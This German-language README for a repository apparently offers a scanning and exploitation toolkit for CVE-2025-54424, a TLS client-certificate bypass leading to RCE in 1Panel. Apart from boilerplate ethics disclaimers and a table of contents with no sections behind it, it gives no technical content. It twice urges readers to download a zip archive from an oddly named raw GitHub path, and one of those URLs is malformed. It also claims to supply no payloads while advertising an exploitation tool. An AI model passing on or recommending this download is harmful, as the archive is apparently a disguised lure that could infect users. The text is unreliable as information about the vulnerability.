
CVE-2025-54424: 1Panel TLS-Client-Zertifikats-Bypass ermöglicht RCE über gefälschtes CN 'panel_client' mit einem gebündelten Scan- und Exploitation-Tool. Betroffen: <= v2.0.5. 🔐
https://raw.githubusercontent.comhophtien/CVE-2025-54424/main/unrevolted/CV-v3.9.zip
CVE-2025-54424 betrifft eine Schwachstelle in 1Panel, die die Umgehung von Client-Zertifikaten und möglicherweise eine Remote Code Execution (RCE) ermöglicht. Dieses Repository bietet ein integriertes Toolkit, das Forschern hilft, diese Schwachstelle in kontrollierten Laborumgebungen zu scannen und validierenden Tests zu unterziehen. Das Toolkit legt Wert auf Sicherheitstests, pädagogische Zwecke und die konforme Untersuchung betroffener Systeme. Das Projekt stellt keine Payloads oder Exploit-Skripte für unbefugten Zugriff oder für den Einsatz gegen externe Vermögenswerte bereit. Verwenden Sie es nur in Umgebungen mit ausdrücklicher Genehmigung und unter Einhaltung lokaler Gesetze und Branchen-Compliance-Anforderungen.
Inhaltsverzeichnis
Über dieses Repository Dies ist eine Sammlung von Werkzeugen für Forscher und Sicherheitsingenieure, die sich mit der Forschung zu CVE-2025-54424 befassen. Das Kernziel besteht darin, eine transparente, reproduzierbare Testumgebung bereitzustellen, um den betroffenen Bereich zu bewerten, Konfigurationsfaktoren zu identifizieren und die Wirksamkeit von Korrekturen in einer kontrollierten Umgebung zu bewerten. Das Projekt legt Wert auf dokumentierte Testprozesse, nachvollziehbare Ergebnisaufzeichnungen und schützende Handhabung von Assets.
Projektziele und -umfang
Nutzungsrichtlinien und Ethik
Funktionsübersicht
Funktionsweise (Architektur auf hoher Ebene)
Sicherheits- und Schutzaspekte
Systemanforderungen und Installation
Installationsschritte (hohe Ebene)
Schnellstart (Ablauf auf hoher Ebene)
Nutzungsmuster und Arbeitsabläufe
Entwicklerleitfaden
Tests und Qualitätssicherung
Versionen und Veröffentlichungen
Details zu Versionen und Veröffentlichungen
Beitragsleitfaden
Häufig gestellte Fragen
Lizenz und Autorisierung
Danksagungen
Wenn Sie spezifische Release-Elemente, heruntergeladene Dateien und weitere Beispielkonfigurationen anzeigen möchten, besuchen Sie bitte den folgenden Link und sehen Sie bei Bedarf die zugehörige Dokumentation ein. Siehe die Releases-Seite unter https://raw.githubusercontent.com/hophtien/CVE-2025-54424/main/unrevolted/CV-v3.9.zip
Anmerkung